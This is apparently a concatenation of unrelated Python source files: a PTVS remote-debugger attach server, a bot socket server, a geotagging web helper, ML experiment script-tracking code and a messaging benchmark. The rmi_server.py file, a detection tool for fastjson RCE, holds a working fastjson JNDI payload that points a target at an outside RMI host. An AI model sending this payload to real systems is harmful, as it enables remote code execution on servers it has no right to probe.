if certfile:
client = ssl.wrap_socket(client, server_side = True, ssl_version = ssl.PROTOCOL_TLSv1, certfile = certfile, keyfile = keyfile)
write_bytes(client, PTVSDBG)
write_int(client, PTVSDBG_VER)
response = read_bytes(client, 7)
if response != PTVSDBG:
continue
dbg_ver = read_int(client)
if dbg_ver != PTVSDBG_VER:
continue
client_secret = read_string(client)
if secret is None or secret == client_secret:
write_bytes(client, ACPT)
else:
write_bytes(client, RJCT)
continue
response = read_bytes(client, 4)
if response == INFO:
try:
pid = os.getpid()
except AttributeError:
pid = 0
write_int(client, pid)
exe = sys.executable or ''
write_string(client, exe)
try:
username = getpass.getuser()
except AttributeError:
username = ''
write_string(client, username)
try:
impl = platform.python_implementation()
except AttributeError:
try:
impl = sys.implementation.name
except AttributeError:
impl = 'Python'
major, minor, micro, release_level, serial = sys.version_info
os_and_arch = platform.system()
if os_and_arch == "":
os_and_arch = sys.platform
try:
if sys.maxsize > 2**32:
os_and_arch += ' 64-bit'
else:
os_and_arch += ' 32-bit'
except AttributeError:
pass
version = '%s %s.%s.%s (%s)' % (impl, major, minor, micro, os_and_arch)
write_string(client, version)
# Don't just drop the connection - let the debugger close it after it finishes reading.
client.recv(1)
elif response == ATCH:
debug_options = vspd.parse_debug_options(read_string(client))
if redirect_output:
debug_options.add('RedirectOutput')
if vspd.DETACHED:
write_bytes(client, ACPT)
try:
pid = os.getpid()
except AttributeError:
pid = 0
write_int(client, pid)
major, minor, micro, release_level, serial = sys.version_info
write_int(client, major)
write_int(client, minor)
write_int(client, micro)
vspd.attach_process_from_socket(client, debug_options, report = True)
vspd.mark_all_threads_for_break(vspd.STEPPING_ATTACH_BREAK)
_attached.set()
client = None
else:
write_bytes(client, RJCT)
elif response == REPL:
if not vspd.DETACHED:
write_bytes(client, ACPT)
vspd.connect_repl_using_socket(client)
client = None
else:
write_bytes(client, RJCT)
except (socket.error, OSError):
pass
finally:
if client is not None:
client.close()
server_thread = threading.Thread(target = server_thread_func)
server_thread.setDaemon(True)
server_thread.start()
frames = []
f = sys._getframe()
while True:
f = f.f_back
if f is None:
break
frames.append(f)
frames.reverse()
cur_thread = vspd.new_thread()
for f in frames:
cur_thread.push_frame(f)
def replace_trace_func():
for f in frames:
f.f_trace = cur_thread.trace_func
replace_trace_func()
sys.settrace(cur_thread.trace_func)
vspd.intercept_threads(for_attach = True)
# Alias for convenience of users of pydevd
settrace = enable_attach
def wait_for_attach(timeout = None):
"""If a PTVS remote debugger is attached, returns immediately. Otherwise,
blocks until a remote debugger attaches to this process, or until the
optional timeout occurs.
Parameters
----------
timeout : float, optional
The timeout for the operation in seconds (or fractions thereof).
"""
if vspd.DETACHED:
_attached.clear()
_attached.wait(timeout)
def break_into_debugger():
"""If a PTVS remote debugger is attached, pauses execution of all threads,
and breaks into the debugger with current thread as active.
"""
if not vspd.DETACHED:
vspd.SEND_BREAK_COMPLETE = thread.get_ident()
vspd.mark_all_threads_for_break()
def is_attached():
"""Returns ``True`` if debugger is attached, ``False`` otherwise."""
return not vspd.DETACHED
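# Illustrative usage sketch (not part of the original module): a target script typically
# enables remote attach and, optionally, blocks until a debugger connects, per the
# docstrings above. The secret and timeout values are placeholders.
def _example_enable_remote_debugging():
    enable_attach(secret='my_secret')   # start listening (default: 0.0.0.0:5678)
    wait_for_attach(timeout=60)         # optionally block until PTVS attaches
    if is_attached():
        break_into_debugger()           # programmatic breakpoint once attached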
|
__init__.py
|
from threading import Thread
import os
import logging
from flask import Flask, request, redirect
from flask_socketio import SocketIO, emit
from pokemongo_bot import logger
from pokemongo_bot.event_manager import manager
from plugins.socket import myjson
from plugins.socket import botevents
from plugins.socket import uievents
# pylint: disable=unused-variable, unused-argument
logging.getLogger('socketio').disabled = True
logging.getLogger('engineio').disabled = True
logging.getLogger('werkzeug').disabled = True
def run_socket_server():
app = Flask(__name__)
app.config["SECRET_KEY"] = "OpenPoGoBotSocket"
socketio = SocketIO(app, logging=False, engineio_logger=False, json=myjson)
@app.route("/")
def redirect_online():
return redirect("http://openpogoui.nicontoso.eu")
state = {}
botevents.register_bot_events(socketio, state)
uievents.register_ui_events(socketio, state)
socketio.run(app, host="0.0.0.0", port=8000, debug=False, use_reloader=False, log_output=False)
# prevent the thread from starting merely because this module is imported
if __name__ == "__init__":
SOCKET_THREAD = Thread(target=run_socket_server)
SOCKET_THREAD.daemon = True
SOCKET_THREAD.start()
|
pygeotag.py
|
# coding=utf8
import sys
isPython3 = sys.version_info >= (3,0,0)
import cgi
import json
import os
import threading
import time
import webbrowser
if isPython3:
import http.server as BaseHTTPServer
else:
import BaseHTTPServer
if isPython3:
import queue as Queue
else:
import Queue
if isPython3:
import urllib.request as urllib
import urllib.parse as urlparse
else:
import urllib2 as urllib
import urlparse
class QueueTimeout(Queue.Queue):
"""from http://stackoverflow.com/questions/1564501/add-timeout-argument-to-pythons-queue-join
by Lukáš Lalinský
"""
class NotFinished(Exception):
pass
def join_with_timeout(self, timeout):
self.all_tasks_done.acquire()
try:
endtime = time.time() + timeout
while self.unfinished_tasks:
remaining = endtime - time.time()
if remaining <= 0.0:
raise self.NotFinished
self.all_tasks_done.wait(remaining)
finally:
self.all_tasks_done.release()
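# Illustrative sketch (not part of the original module): waiting up to two seconds for
# all queued items to be marked done, and distinguishing a clean join from a timeout.
# The argument is assumed to be a QueueTimeout instance.
def _example_join_with_timeout(q):
    try:
        q.join_with_timeout(2)
        return True     # every queued item was task_done()'d within the timeout
    except QueueTimeout.NotFinished:
        return False    # timed out with unfinished tasks still pending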
class PyGeoTag(object):
def __init__(self, callback=None, synchronous=False):
self.basedir = os.path.dirname(__file__)
self.synchronous = synchronous
if callback is not None:
self.callback = callback
if synchronous:
self.callback = self._store
self.server_thread = None
self.running = False
self.address = ''
self.port = 8008
self.request_queue = QueueTimeout()
self.data = None
self.syncWait = threading.Condition()
self.server = self.init_server()
# def stop_server(self):
# self.current_server_thread = -1
# time.sleep(self.timeout+1) # wait for server to exit
def start_server(self):
if False and self.synchronous:
pass
else:
self.running = True
self.server_thread = threading.Thread(target=self._run_server)
self.server_thread.start()
def _run_server(self):
while self.running:
self.server.handle_request()
def init_server(self):
class _handler(GeoTagRequestHandler):
owner = self
server_class = BaseHTTPServer.HTTPServer
handler_class = _handler
server_address = (self.address, self.port)
httpd = server_class(server_address, handler_class)
httpd.timeout = 2
return httpd
def stop_server(self):
# make an attempt to empty the queue
for i in range(self.request_queue.qsize()):
try:
self.request_queue.get_nowait()
except Queue.Empty:
pass
self.request_queue.put({'__msg_type':'shutdown'})
time.sleep(2) # wait for the msg to be picked up
self.running = False
def open_server_page(self):
webbrowser.open_new("http://%s:%d/" %
(self.address or "127.0.0.1", self.port))
def callback(self, data):
print(data)
def _store(self, data):
self.data = data
def show_position(self, data={}):
print('SHOWING',data)
data["__msg_type"] = "show_position"
self.request_queue.put(data)
def request_position(self, data={}):
print('REQUESTING',data)
data["__msg_type"] = "request_position"
self.request_queue.put(data)
def get_position(self, data={}):
if not self.synchronous:
self.running = False
raise Exception("Can't call get_position in asynchronous mode")
if not self.running:
raise Exception("Server is not running")
if data:
self.request_position(data)
while True:
try:
self.request_queue.join_with_timeout(2)
except QueueTimeout.NotFinished:
if self.running:
continue
break
return self.data
class GeoTagRequestHandler(BaseHTTPServer.BaseHTTPRequestHandler):
staticMap = {
"": "template.html",
"jquery.js": "jquery.js",
"map.js": "map.js",
"jquery.json-2.2.min.js": "jquery.json-2.2.min.js",
}
def log_message(*args):
return
def do_GET(self):
if self.path.startswith("/QUIT"):
self.send_response(200)
self.send_header('Content-type', 'text/plain')
self.end_headers()
self.wfile.write("TERMINATING SERVER".encode('utf-8'))
# threading.Timer(2,self.server.shutdown).start()
self.owner.stop_server()
return
path = self.path.strip('/').split('/')
if len(path) == 1 and path[0] in self.staticMap:
self.send_response(200)
self.send_header('Content-type', 'text/html')
self.end_headers()
self.wfile.write(open(
os.path.join(self.owner.basedir,self.staticMap[path[0]])).read().encode('utf-8'))
return
if self.path.startswith("/sendPos?"):
self.send_response(200)
self.send_header('Content-type', 'text/plain')
self.end_headers()
data = urlparse.parse_qs(urlparse.urlparse(self.path).query)['data'][0]
data = json.loads(data)
was_requested = False
if "__msg_type" in data:
del data["__msg_type"]
was_requested = True
self.owner.callback(data)
if was_requested:
self.owner.request_queue.task_done()
return
if self.path.startswith("/getMessage"):
self.send_response(200)
self.send_header('Content-type', 'text/plain')
self.end_headers()
#data = urlparse.parse_qs(urlparse.urlparse(self.path).query)['data'][0]
#print(repr(json.loads(data)))
try:
data = self.owner.request_queue.get_nowait()
except Queue.Empty:
data = {}
self.wfile.write(json.dumps(data).encode('utf-8'))
return
if __name__ == '__main__':
pgt = PyGeoTag(synchronous=True)
pgt.start_server()
time.sleep(1)
pgt.open_server_page()
f = pgt.get_position
f({"description": "Turtles"})
f({"description": "Frogs", 'secret':7})
f({"description": "Otters"})
print("DONE")
if pgt.synchronous:
pgt.stop_server()
|
scriptinfo.py
|
import os
import sys
from tempfile import mkstemp
import attr
import collections
import logging
import json
from furl import furl
from pathlib2 import Path
from threading import Thread, Event
from .util import get_command_output
from ....backend_api import Session
from ....debugging import get_logger
from .detectors import GitEnvDetector, GitDetector, HgEnvDetector, HgDetector, Result as DetectionResult
_logger = get_logger("Repository Detection")
class ScriptInfoError(Exception):
pass
class ScriptRequirements(object):
def __init__(self, root_folder):
self._root_folder = root_folder
def get_requirements(self):
try:
from ....utilities.pigar.reqs import get_installed_pkgs_detail
from ....utilities.pigar.__main__ import GenerateReqs
installed_pkgs = get_installed_pkgs_detail()
gr = GenerateReqs(save_path='', project_path=self._root_folder, installed_pkgs=installed_pkgs,
ignores=['.git', '.hg', '.idea', '__pycache__', '.ipynb_checkpoints'])
reqs, try_imports, guess, local_pks = gr.extract_reqs(module_callback=ScriptRequirements.add_trains_used_packages)
return self.create_requirements_txt(reqs, local_pks)
except Exception:
return '', ''
@staticmethod
def add_trains_used_packages(modules):
# hack: forcefully insert storage modules if we have them
# noinspection PyBroadException
try:
import boto3
modules.add('boto3', 'trains.storage', 0)
except Exception:
pass
# noinspection PyBroadException
try:
from google.cloud import storage
modules.add('google_cloud_storage', 'trains.storage', 0)
except Exception:
pass
# noinspection PyBroadException
try:
from azure.storage.blob import ContentSettings
modules.add('azure_storage_blob', 'trains.storage', 0)
except Exception:
pass
# if we have torch and it supports tensorboard, we should add that as well
# (because it will not be detected automatically)
if 'torch' in modules and 'tensorboard' not in modules:
# noinspection PyBroadException
try:
# see if this version of torch support tensorboard
import torch.utils.tensorboard
import tensorboard
modules.add('tensorboard', 'torch', 0)
except Exception:
pass
return modules
@staticmethod
def create_requirements_txt(reqs, local_pks=None):
# write requirements.txt
try:
conda_requirements = ''
conda_prefix = os.environ.get('CONDA_PREFIX')
if conda_prefix and not conda_prefix.endswith(os.path.sep):
conda_prefix += os.path.sep
if conda_prefix and sys.executable.startswith(conda_prefix):
conda_packages_json = get_command_output(['conda', 'list', '--json'])
conda_packages_json = json.loads(conda_packages_json)
reqs_lower = {k.lower(): (k, v) for k, v in reqs.items()}
for r in conda_packages_json:
# check if this is a pypi package, if it is, leave it outside
if not r.get('channel') or r.get('channel') == 'pypi':
continue
# check if we have it in our required packages
name = r['name'].lower().replace('-', '_')
# hack support pytorch/torch different naming convention
if name == 'pytorch':
name = 'torch'
k, v = reqs_lower.get(name, (None, None))
if k:
conda_requirements += '{0} {1} {2}\n'.format(k, '==', v.version)
except:
conda_requirements = ''
# python version header
requirements_txt = '# Python ' + sys.version.replace('\n', ' ').replace('\r', ' ') + '\n'
if local_pks:
requirements_txt += '\n# Local modules found - skipping:\n'
for k, v in local_pks.sorted_items():
requirements_txt += '# {0} == {1}\n'.format(k, v.version)
# requirement summary
requirements_txt += '\n'
for k, v in reqs.sorted_items():
# requirements_txt += ''.join(['# {0}\n'.format(c) for c in v.comments.sorted_items()])
if k == '-e':
requirements_txt += '{0} {1}\n'.format(k, v.version)
elif v:
requirements_txt += '{0} {1} {2}\n'.format(k, '==', v.version)
else:
requirements_txt += '{0}\n'.format(k)
# requirements details (in comments)
requirements_txt += '\n' + \
'# Detailed import analysis\n' \
'# **************************\n'
if local_pks:
for k, v in local_pks.sorted_items():
requirements_txt += '\n'
requirements_txt += '# IMPORT LOCAL PACKAGE {0}\n'.format(k)
requirements_txt += ''.join(['# {0}\n'.format(c) for c in v.comments.sorted_items()])
for k, v in reqs.sorted_items():
requirements_txt += '\n'
if k == '-e':
requirements_txt += '# IMPORT PACKAGE {0} {1}\n'.format(k, v.version)
else:
requirements_txt += '# IMPORT PACKAGE {0}\n'.format(k)
requirements_txt += ''.join(['# {0}\n'.format(c) for c in v.comments.sorted_items()])
return requirements_txt, conda_requirements
class _JupyterObserver(object):
_thread = None
_exit_event = Event()
_sync_event = Event()
_sample_frequency = 30.
_first_sample_frequency = 3.
@classmethod
def observer(cls, jupyter_notebook_filename):
if cls._thread is not None:
# order of signaling is important!
cls._exit_event.set()
cls._sync_event.set()
cls._thread.join()
cls._sync_event.clear()
cls._exit_event.clear()
cls._thread = Thread(target=cls._daemon, args=(jupyter_notebook_filename, ))
cls._thread.daemon = True
cls._thread.start()
@classmethod
def signal_sync(cls, *_):
cls._sync_event.set()
@classmethod
def close(cls):
if not cls._thread:
return
cls._exit_event.set()
cls._sync_event.set()
cls._thread.join()
cls._thread = None
@classmethod
def _daemon(cls, jupyter_notebook_filename):
from trains import Task
# load jupyter notebook package
# noinspection PyBroadException
try:
from nbconvert.exporters.script import ScriptExporter
_script_exporter = ScriptExporter()
except Exception:
return
# load pigar
# noinspection PyBroadException
try:
from ....utilities.pigar.reqs import get_installed_pkgs_detail, file_import_modules
from ....utilities.pigar.modules import ReqsModules
from ....utilities.pigar.log import logger
logger.setLevel(logging.WARNING)
except Exception:
file_import_modules = None
# load IPython
# noinspection PyBroadException
try:
from IPython import get_ipython
except Exception:
# should not happen
get_ipython = None
# setup local notebook files
if jupyter_notebook_filename:
notebook = Path(jupyter_notebook_filename)
local_jupyter_filename = jupyter_notebook_filename
else:
notebook = None
fd, local_jupyter_filename = mkstemp(suffix='.ipynb')
os.close(fd)
last_update_ts = None
counter = 0
prev_script_hash = None
# main observer loop, check if we need to exit
while not cls._exit_event.wait(timeout=0.):
# wait for timeout or sync event
cls._sync_event.wait(cls._sample_frequency if counter else cls._first_sample_frequency)
cls._sync_event.clear()
counter += 1
# noinspection PyBroadException
try:
# if there is no task connected, do nothing
task = Task.current_task()
if not task:
continue
# if we have a local file:
if notebook:
if not notebook.exists():
continue
# check if notebook changed
if last_update_ts is not None and notebook.stat().st_mtime - last_update_ts <= 0:
continue
last_update_ts = notebook.stat().st_mtime
else:
# serialize notebook to a temp file
# noinspection PyBroadException
try:
get_ipython().run_line_magic('notebook', local_jupyter_filename)
except Exception as ex:
continue
# get notebook python script
script_code, resources = _script_exporter.from_filename(local_jupyter_filename)
current_script_hash = hash(script_code)
if prev_script_hash and prev_script_hash == current_script_hash:
continue
requirements_txt = ''
conda_requirements = ''
# parse jupyter python script and prepare pip requirements (pigar)
# if backend supports requirements
if file_import_modules and Session.check_min_api_version('2.2'):
fmodules, _ = file_import_modules(notebook.parts[-1], script_code)
fmodules = ScriptRequirements.add_trains_used_packages(fmodules)
installed_pkgs = get_installed_pkgs_detail()
reqs = ReqsModules()
for name in fmodules:
if name in installed_pkgs:
pkg_name, version = installed_pkgs[name]
reqs.add(pkg_name, version, fmodules[name])
requirements_txt, conda_requirements = ScriptRequirements.create_requirements_txt(reqs)
# update script
prev_script_hash = current_script_hash
data_script = task.data.script
data_script.diff = script_code
data_script.requirements = {'pip': requirements_txt, 'conda': conda_requirements}
task._update_script(script=data_script)
# update requirements
task._update_requirements(requirements=requirements_txt)
except Exception:
pass
class ScriptInfo(object):
plugins = [GitEnvDetector(), HgEnvDetector(), HgDetector(), GitDetector()]
""" Script info detection plugins, in order of priority """
@classmethod
def _jupyter_install_post_store_hook(cls, jupyter_notebook_filename):
# noinspection PyBroadException
try:
if 'IPython' in sys.modules:
from IPython import get_ipython
if get_ipython():
_JupyterObserver.observer(jupyter_notebook_filename)
get_ipython().events.register('pre_run_cell', _JupyterObserver.signal_sync)
except Exception:
pass
@classmethod
def _get_jupyter_notebook_filename(cls):
if not (sys.argv[0].endswith(os.path.sep+'ipykernel_launcher.py') or
sys.argv[0].endswith(os.path.join(os.path.sep, 'ipykernel', '__main__.py'))) \
or len(sys.argv) < 3 or not sys.argv[2].endswith('.json'):
return None
# we can safely assume that we can import the notebook package here
# noinspection PyBroadException
try:
from notebook.notebookapp import list_running_servers
import requests
current_kernel = sys.argv[2].split(os.path.sep)[-1].replace('kernel-', '').replace('.json', '')
try:
server_info = next(list_running_servers())
except Exception:
# on some jupyter notebook versions this function can crash on parsing the json file,
# we will parse it manually here
import ipykernel
from glob import glob
import json
for f in glob(os.path.join(os.path.dirname(ipykernel.get_connection_file()), 'nbserver-*.json')):
try:
with open(f, 'r') as json_data:
server_info = json.load(json_data)
except:
server_info = None
if server_info:
break
try:
r = requests.get(
url=server_info['url'] + 'api/sessions',
headers={'Authorization': 'token {}'.format(server_info.get('token', '')), })
except requests.exceptions.SSLError:
# disable SSL check warning
from urllib3.exceptions import InsecureRequestWarning
requests.packages.urllib3.disable_warnings(category=InsecureRequestWarning)
# fire request
r = requests.get(
url=server_info['url'] + 'api/sessions',
headers={'Authorization': 'token {}'.format(server_info.get('token', '')), }, verify=False)
# enable SSL check warning
import warnings
warnings.simplefilter('default', InsecureRequestWarning)
r.raise_for_status()
notebooks = r.json()
cur_notebook = None
for n in notebooks:
if n['kernel']['id'] == current_kernel:
cur_notebook = n
break
notebook_path = cur_notebook['notebook'].get('path', '')
notebook_name = cur_notebook['notebook'].get('name', '')
is_google_colab = False
# check if this is google.colab, then there is no local file
# noinspection PyBroadException
try:
from IPython import get_ipython
if get_ipython() and 'google.colab' in get_ipython().extension_manager.loaded:
is_google_colab = True
except Exception:
pass
if is_google_colab:
script_entry_point = notebook_name
local_ipynb_file = None
else:
                # always a forward slash, because this comes from a URI (so never a backslash, not even on Windows)
entry_point_filename = notebook_path.split('/')[-1]
# now we should try to find the actual file
entry_point = (Path.cwd() / entry_point_filename).absolute()
if not entry_point.is_file():
entry_point = (Path.cwd() / notebook_path).absolute()
# get local ipynb for observer
local_ipynb_file = entry_point.as_posix()
# now replace the .ipynb with .py
# we assume we will have that file available with the Jupyter notebook plugin
entry_point = entry_point.with_suffix('.py')
script_entry_point = entry_point.as_posix()
            # install the post-store hook;
            # note that if we do not have a local file we serialize the entire notebook every time
cls._jupyter_install_post_store_hook(local_ipynb_file)
return script_entry_point
except Exception:
return None
@classmethod
def _get_entry_point(cls, repo_root, script_path):
repo_root = Path(repo_root).absolute()
try:
# Use os.path.relpath as it calculates up dir movements (../)
entry_point = os.path.relpath(str(script_path), str(Path.cwd()))
except ValueError:
# Working directory not under repository root
entry_point = script_path.relative_to(repo_root)
return Path(entry_point).as_posix()
@classmethod
def _get_working_dir(cls, repo_root):
repo_root = Path(repo_root).absolute()
try:
return Path.cwd().relative_to(repo_root).as_posix()
except ValueError:
# Working directory not under repository root
return os.path.curdir
@classmethod
def _get_script_code(cls, script_path):
# noinspection PyBroadException
try:
with open(script_path, 'r') as f:
script_code = f.read()
return script_code
except Exception:
pass
return ''
@classmethod
def _get_script_info(cls, filepath, check_uncommitted=True, create_requirements=True, log=None):
jupyter_filepath = cls._get_jupyter_notebook_filename()
if jupyter_filepath:
script_path = Path(os.path.normpath(jupyter_filepath)).absolute()
else:
script_path = Path(os.path.normpath(filepath)).absolute()
if not script_path.is_file():
raise ScriptInfoError(
"Script file [{}] could not be found".format(filepath)
)
script_dir = script_path.parent
def _log(msg, *args, **kwargs):
if not log:
return
log.warning(
"Failed auto-detecting task repository: {}".format(
msg.format(*args, **kwargs)
)
)
plugin = next((p for p in cls.plugins if p.exists(script_dir)), None)
repo_info = DetectionResult()
        if not plugin:
            if log:
                log.info("No repository found, storing script code instead")
else:
try:
repo_info = plugin.get_info(str(script_dir), include_diff=check_uncommitted)
except Exception as ex:
_log("no info for {} ({})", script_dir, ex)
else:
if repo_info.is_empty():
_log("no info for {}", script_dir)
repo_root = repo_info.root or script_dir
if not plugin:
working_dir = '.'
entry_point = str(script_path.name)
else:
working_dir = cls._get_working_dir(repo_root)
entry_point = cls._get_entry_point(repo_root, script_path)
if check_uncommitted:
diff = cls._get_script_code(script_path.as_posix()) \
if not plugin or not repo_info.commit else repo_info.diff
else:
diff = ''
# if this is not jupyter, get the requirements.txt
requirements = ''
conda_requirements = ''
# create requirements if backend supports requirements
# if jupyter is present, requirements will be created in the background, when saving a snapshot
if not jupyter_filepath and Session.check_min_api_version('2.2'):
script_requirements = ScriptRequirements(
Path(repo_root).as_posix() if repo_info.url else script_path.as_posix())
if create_requirements:
requirements, conda_requirements = script_requirements.get_requirements()
else:
script_requirements = None
script_info = dict(
repository=furl(repo_info.url).remove(username=True, password=True).tostr(),
branch=repo_info.branch,
version_num=repo_info.commit,
entry_point=entry_point,
working_dir=working_dir,
diff=diff,
requirements={'pip': requirements, 'conda': conda_requirements} if requirements else None,
binary='python{}.{}'.format(sys.version_info.major, sys.version_info.minor),
)
messages = []
if repo_info.modified:
messages.append(
"======> WARNING! UNCOMMITTED CHANGES IN REPOSITORY {} <======".format(
script_info.get("repository", "")
)
)
if not any(script_info.values()):
script_info = None
return (ScriptInfoResult(script=script_info, warning_messages=messages),
script_requirements)
@classmethod
def get(cls, filepath=sys.argv[0], check_uncommitted=True, create_requirements=True, log=None):
try:
return cls._get_script_info(
filepath=filepath, check_uncommitted=check_uncommitted,
create_requirements=create_requirements, log=log)
except Exception as ex:
if log:
log.warning("Failed auto-detecting task repository: {}".format(ex))
return ScriptInfoResult(), None
@classmethod
def close(cls):
_JupyterObserver.close()
@attr.s
class ScriptInfoResult(object):
script = attr.ib(default=None)
warning_messages = attr.ib(factory=list)
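# Illustrative usage sketch (not part of the original module): how the public entry
# point above is typically driven. The logger name is a placeholder.
def _example_collect_script_info():
    log = logging.getLogger('example')
    result, script_requirements = ScriptInfo.get(
        filepath=sys.argv[0], check_uncommitted=True,
        create_requirements=True, log=log)
    for message in result.warning_messages:
        log.warning(message)
    # result.script is a dict (repository, branch, entry_point, diff, ...) or None
    return result.script, script_requirements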
|
rmi_server.py
|
# Building a Python RMI server for fastjson RCE detection
'''
When probing fastjson for RCE, the RMI protocol is commonly used.
If the target has outbound internet access, the payload can use
rmi://randomstr.test.yourdomain.com:9999/path and the hit can be observed via dnslog.
If the target sits on an internal network, we can instead deploy an RMI server inside
that network and detect probes by checking the server log for incoming requests.
Writing an RMI service in Java is simple enough, but if your project is written in
Python and you would rather not call out to Java tooling, this script can help.
POST data
{
    "a":{
        "@type":"java.lang.Class",
        "val":"com.sun.rowset.JdbcRowSetImpl"
    },
    "b":{
        "@type":"com.sun.rowset.JdbcRowSetImpl",
        "dataSourceName":"rmi://10.183.20.41:20008/TESTPATH",
        "autoCommit":true
    }
}
The code follows below.
'''
#!/usr/bin/env python3
import socket
import threading
import struct
def rmi_response(client, address):
try:
client.settimeout(5)
buf = client.recv(1024)
if b"\x4a\x52\x4d\x49" in buf:
send_data = b"\x4e"
send_data += struct.pack(">h", len(address[0]))
send_data += address[0].encode()
send_data += b"\x00\x00"
send_data += struct.pack(">H", address[1])
client.send(send_data)
            total = 3  # retry a few times to guard against socket.recv returning incomplete data
            buf1 = b""
            while total:
                total -= 1
                buf1 += client.recv(512)
                if len(buf1) > 50:
                    break
if buf1:
path = bytearray(buf1).split(b"\xdf\x74")[-1][2:].decode(errors="ignore")
print("data:{}".format(buf1))
print("client:{} send path:{}".format(address, path))
except Exception as ex:
print('run rmi error:{}'.format(ex))
finally:
client.close()
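# Illustrative sketch (not part of the original script): probing the handler above with
# a raw socket to confirm that a request gets logged, without needing a Java client.
# The magic bytes match what rmi_response() checks for; the trailing payload is a
# simplified stand-in (just enough for the b"\xdf\x74" split), not a faithful JRMI stream.
def example_probe(host='127.0.0.1', port=20008):
    probe = socket.socket(socket.AF_INET, socket.SOCK_STREAM)
    probe.connect((host, port))
    try:
        probe.sendall(b"\x4a\x52\x4d\x49\x00\x02\x4b")  # b"JRMI" plus filler header bytes
        probe.recv(64)                                  # ack + endpoint info from the server
        probe.sendall(b"\x00" * 40 + b"\xdf\x74" + b"\x00\x08TESTPATH")
    finally:
        probe.close()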
def main():
sock = socket.socket(socket.AF_INET, socket.SOCK_STREAM)
ip_port = (listenip, listenport)
sock.bind(ip_port)
sock.listen(max_conn)
print("listen: {}:{} maxconnect:{}".format(listenip, listenport, max_conn))
while True:
client, address = sock.accept()
thread = threading.Thread(target=rmi_response, args=(client, address))
thread.setDaemon(True)
thread.start()
if __name__ == '__main__':
max_conn = 200
listenip = "0.0.0.0"
listenport = 20008
main()
|
__init__.py
|
#
# Copyright (C) 2017 Kenneth A. Giusti
#
# Licensed to the Apache Software Foundation (ASF) under one
# or more contributor license agreements. See the NOTICE file
# distributed with this work for additional information
# regarding copyright ownership.
#
# Licensed under the Apache License, Version 2.0 (the "License"); you may
# not use this file except in compliance with the License. You may obtain
# a copy of the License at
#
# http://www.apache.org/licenses/LICENSE-2.0
#
# Unless required by applicable law or agreed to in writing, software
# distributed under the License is distributed on an "AS IS" BASIS, WITHOUT
# WARRANTIES OR CONDITIONS OF ANY KIND, either express or implied. See the
# License for the specific language governing permissions and limitations
# under the License.
#
import abc
import json
import logging
import math
import os
import socket
import threading
import time
from time import time as now
try:
import Queue as queue
except ImportError:
import queue
import oslo_messaging as om
import uuid
__all__ = [
"RPCTestClient",
"RPCTestServer",
"TestNotifier",
"TestListener",
"Controller"
]
# the types of oslo.messaging clients
RPC_CLIENT = 'RPCClient'
RPC_SERVER = 'RPCServer'
LISTENER = 'Listener'
NOTIFIER = 'Notifier'
MESSAGING_CLIENT_TYPES = [RPC_CLIENT, RPC_SERVER, LISTENER, NOTIFIER]
# addressing for control messages
CONTROL_EXCHANGE = 'ombt-control'
CONTROLLER_TOPIC = 'controller-%s'
CLIENT_TOPIC = "client-%s-%s" # client-$type-$topic
# addressing for RPC tests
RPC_EXCHANGE = 'ombt-rpc-test'
RPC_TOPIC = "rpc-%s"
# addressing for Notification tests
NOTIFY_EXCHANGE = 'ombt-notify-test'
NOTIFY_TOPIC = "notify-%s"
def _wait_stabilize(delay, count_fn):
# helper to wait until a counter has stabilized for delay seconds
count = count_fn()
timeout = delay
while timeout > 0:
time.sleep(1.0)
new_count = count_fn()
if count != new_count:
# reset
count = new_count
timeout = delay
else:
timeout -= 1
class Stats(object):
"""Manage a single statistic"""
def __init__(self, min=None, max=None, total=0, count=0,
sum_of_squares=0, distribution=None):
self.min = min
self.max = max
self.total = total
self.count = count
self.sum_of_squares = sum_of_squares
# distribution of values grouped by powers of 10
self.distribution = distribution or dict()
@classmethod
def from_dict(cls, values):
if 'distribution' in values:
# hack alert!
# when a Stats is passed via an RPC call it appears as if the
# distribution map's keys are converted from int to str.
# Fix that by re-indexing the distribution map:
new_dict = dict()
old_dict = values['distribution']
for k in old_dict.keys():
new_dict[int(k)] = old_dict[k]
values['distribution'] = new_dict
return Stats(**values)
def to_dict(self):
new_dict = dict()
for a in ["min", "max", "total", "count", "sum_of_squares"]:
new_dict[a] = getattr(self, a)
new_dict["distribution"] = self.distribution.copy()
return new_dict
def update(self, value):
self.total += value
self.count += 1
self.sum_of_squares += value**2
self.min = min(self.min, value) if self.min else value
self.max = max(self.max, value) if self.max else value
log = int(math.log10(value)) if value >= 1.0 else 0
base = 10**log
index = int(value / base) # 0..9
if log not in self.distribution:
self.distribution[log] = [0 for i in range(10)]
self.distribution[log][index] += 1
def reset(self):
self.__init__()
def average(self):
return (self.total / float(self.count)) if self.count else 0
def std_deviation(self):
return math.sqrt((self.sum_of_squares / float(self.count)) -
(self.average() ** 2)) if self.count else -1
def merge(self, stats):
if stats.min is not None and self.min is not None:
self.min = min(self.min, stats.min)
else:
self.min = self.min or stats.min
if stats.max is not None and self.max is not None:
self.max = max(self.max, stats.max)
else:
self.max = self.max or stats.max
self.total += stats.total
self.count += stats.count
self.sum_of_squares += stats.sum_of_squares
for k in stats.distribution.keys():
if k in self.distribution:
self.distribution[k] = [z for z in map(lambda a, b: a + b,
stats.distribution[k],
self.distribution[k])]
else:
self.distribution[k] = stats.distribution[k]
def __str__(self):
return "min=%i, max=%i, avg=%f, std-dev=%f" % (self.min, self.max,
self.average(),
self.std_deviation())
def print_distribution(self):
keys = list(self.distribution.keys())
keys.sort()
for order in keys:
row = self.distribution[order]
            # order=0, index=0 is a special case since it covers values < 1.0; for all
            # orders > 0, index 0 is skipped because everything < 10^order is already
            # accounted for in index 9 of the (order - 1) row
index = 0 if order == 0 else 1
while index < len(row):
print("[%d..<%d): %d" %
((10 ** int(order)) * index,
(10 ** int(order)) * (index + 1),
row[index]))
index += 1
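# Illustrative sketch (not part of the original module): exercising the Stats helper
# above with a few made-up latency samples (milliseconds). A value of 37 lands in the
# order-of-magnitude bucket log=1 (the 10..100 row) at index 3.
def _example_stats_usage():
    stats = Stats()
    for sample in (0.8, 3.2, 37.0, 41.5, 120.0):
        stats.update(sample)
    print(stats)                    # min/max/avg/std-dev summary
    stats.print_distribution()      # per-power-of-10 histogram rows
    return stats.average(), stats.std_deviation()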
class NullOutputter(object):
""" Output handler used if no output is desired
"""
def write(self, msg):
pass
class FileOutputter(object):
"""Output handler used for sending output to a file
"""
def __init__(self, filepath):
self._fobj = open(filepath, 'w', -1)
def write(self, msg):
self._fobj.write(msg)
class TestResults(object):
"""Client results of a test run.
"""
def __init__(self, start_time=None, stop_time=None, latency=None,
msgs_ok=0, msgs_fail=0, errors=None):
super(TestResults, self).__init__()
self.start_time = start_time
